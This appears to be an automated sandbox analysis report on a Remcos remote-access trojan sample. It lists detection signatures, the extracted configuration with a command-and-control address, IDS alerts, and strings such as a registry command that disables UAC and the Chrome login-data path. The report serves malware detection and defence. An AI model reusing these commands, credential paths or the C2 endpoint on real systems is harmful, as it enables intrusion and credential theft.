
Windows Analysis Report
1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe

Overview

General Information

Sample name: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe
Analysis ID: 1570007
MD5: 68011a26bb98d3b77de9594ae7624358
SHA1: e065720bd4e4299160f7cbbee1708cd91140dff1
SHA256: 6a050c9c875f5748908ab6c4ced355dd530137e98f3b28f06807c454c52a6dbe
Tags: base64-decoded, exe, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Machine Learning detection for sample
Abnormally high CPU usage
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["104.243.246.120:2030:1"], "Assigned name": "Final", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4NJUM7", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author
1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  Strings:
  • 0x6aaf8:$a1: Remcos restarted by watchdog!
  • 0x6b070:$a3: %02i:%02i:%02i:%03i
1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | REMCOS_RAT_variants | unknown | unknown
  Strings:
  • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64e04:$str_b2: Executing file:
  • 0x65c3c:$str_b3: GetDirectListeningPort
  • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65780:$str_b7: \update.vbs
  • 0x64e2c:$str_b9: Downloaded file:
  • 0x64e18:$str_b10: Downloading file:
  • 0x64ebc:$str_b12: Failed to upload file:
  • 0x65c04:$str_b13: StartForward
  • 0x65c24:$str_b14: StopForward
  • 0x656d8:$str_b15: fso.DeleteFile "
  • 0x6566c:$str_b16: On Error Resume Next
  • 0x65708:$str_b17: fso.DeleteFolder "
  • 0x64eac:$str_b18: Uploaded file:
  • 0x64e6c:$str_b19: Unable to delete:
  • 0x656a0:$str_b20: while fso.FileExists("
  • 0x65349:$str_c0: [Firefox StoredLogins not found]
Source | Rule | Description | Author
00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  Strings:
  • 0x146f8:$a1: Remcos restarted by watchdog!
  • 0x14c70:$a3: %02i:%02i:%02i:%03i
00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
Source | Rule | Description | Author
1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  Strings:
  • 0x6aaf8:$a1: Remcos restarted by watchdog!
  • 0x6b070:$a3: %02i:%02i:%02i:%03i
1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack | REMCOS_RAT_variants | unknown | unknown
  Strings:
  • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64e04:$str_b2: Executing file:
  • 0x65c3c:$str_b3: GetDirectListeningPort
  • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65780:$str_b7: \update.vbs
  • 0x64e2c:$str_b9: Downloaded file:
  • 0x64e18:$str_b10: Downloading file:
  • 0x64ebc:$str_b12: Failed to upload file:
  • 0x65c04:$str_b13: StartForward
  • 0x65c24:$str_b14: StopForward
  • 0x656d8:$str_b15: fso.DeleteFile "
  • 0x6566c:$str_b16: On Error Resume Next
  • 0x65708:$str_b17: fso.DeleteFolder "
  • 0x64eac:$str_b18: Uploaded file:
  • 0x64e6c:$str_b19: Unable to delete:
  • 0x656a0:$str_b20: while fso.FileExists("
  • 0x65349:$str_c0: [Firefox StoredLogins not found]

                      Stealing of Sensitive Information

                      Source: Registry Key setAuthor: Joe Security: Data: Details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ventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, ProcessId: 5272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-4NJUM7\exepath
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T14:11:10.451566+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50002 | 104.243.246.120 | 2030 | TCP
2024-12-06T14:11:40.154154+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49731 | 104.243.246.120 | 2030 | TCP
2024-12-06T14:12:03.185927+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49792 | 104.243.246.120 | 2030 | TCP
2024-12-06T14:12:26.201641+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49844 | 104.243.246.120 | 2030 | TCP
2024-12-06T14:12:49.249157+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49900 | 104.243.246.120 | 2030 | TCP
2024-12-06T14:13:12.280515+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49953 | 104.243.246.120 | 2030 | TCP
2024-12-06T14:13:35.315155+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49995 | 104.243.246.120 | 2030 | TCP
2024-12-06T14:13:58.359734+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49996 | 104.243.246.120 | 2030 | TCP
2024-12-06T14:14:21.406877+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49998 | 104.243.246.120 | 2030 | TCP
2024-12-06T14:14:44.439475+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49999 | 104.243.246.120 | 2030 | TCP
2024-12-06T14:15:07.501287+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50001 | 104.243.246.120 | 2030 | TCP

                      AV Detection

Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Avira: detected
Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["104.243.246.120:2030:1"], "Assigned name": "Final", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4NJUM7", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | ReversingLabs: Detection: 87%
Source: Yara match | File source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4758896538.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe PID: 5272, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 96.5% probability
Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,1_2_0043293A
Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_3adf2d00-3

                      Exploits

Source: Yara match | File source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe PID: 5272, type: MEMORYSTR

                      Privilege Escalation

Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00406764 _wcslen,CoGetObject,1_2_00406764
Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,1_2_0040B335
Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,1_2_0041B42F
Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,1_2_0040B53A
Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0044D5E9 FindFirstFileExA,1_2_0044D5E9
Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,1_2_004089A9
Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00406AC2 FindFirstFileW,FindNextFileW,1_2_00406AC2
Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,1_2_00407A8C
Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,1_2_00418C69
Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,1_2_00408DA7
Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,1_2_00406F06

                      Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49731 -> 104.243.246.120:2030
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49792 -> 104.243.246.120:2030
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49844 -> 104.243.246.120:2030
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49900 -> 104.243.246.120:2030
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49995 -> 104.243.246.120:2030
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49996 -> 104.243.246.120:2030
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49953 -> 104.243.246.120:2030
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49998 -> 104.243.246.120:2030
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50001 -> 104.243.246.120:2030
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49999 -> 104.243.246.120:2030
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50002 -> 104.243.246.120:2030
Source: Malware configuration extractor | IPs: 104.243.246.120
Source: global traffic | TCP traffic: 192.168.2.6:49731 -> 104.243.246.120:2030
Source: Joe Sandbox View | ASN Name: VOXILITYGB VOXILITYGB
Source: unknown | TCP traffic detected without corresponding DNS query: 104.243.246.120 (this entry appears 50 times in the report)
Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_004260F7 recv,1_2_004260F7
Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | String found in binary or memory: http://geoplugin.net/json.gp
Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | String found in binary or memory: http://geoplugin.net/json.gp/C

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000,1_2_004099E4
Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_004159C6 (this entry appears three times in the report)
Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,1_2_00409B10
Source: Yara match | File source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe PID: 5272, type: MEMORYSTR

                      E-Banking Fraud

Source: Yara match | File source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4758896538.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe PID: 5272, type: MEMORYSTR

                      Spam, unwanted Advertisements and Ransom Demands

                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0041BB77 SystemParametersInfoW | 1_2_0041BB77

                      System Summary

                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE | Matched rule: REMCOS_RAT_variants | Author: unknown
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
                      Source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                      Source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
                      Source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
                      Source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                      Source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
                      Source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
                      Source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                      Source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                      Source: Process Memory Space: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe PID: 5272, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Process Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle | 1_2_0041ACC1
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle | 1_2_0041ACED
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress | 1_2_004158B9
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0041D071 | 1_2_0041D071
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_004520D2 | 1_2_004520D2
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0043D098 | 1_2_0043D098
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00437150 | 1_2_00437150
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_004361AA | 1_2_004361AA
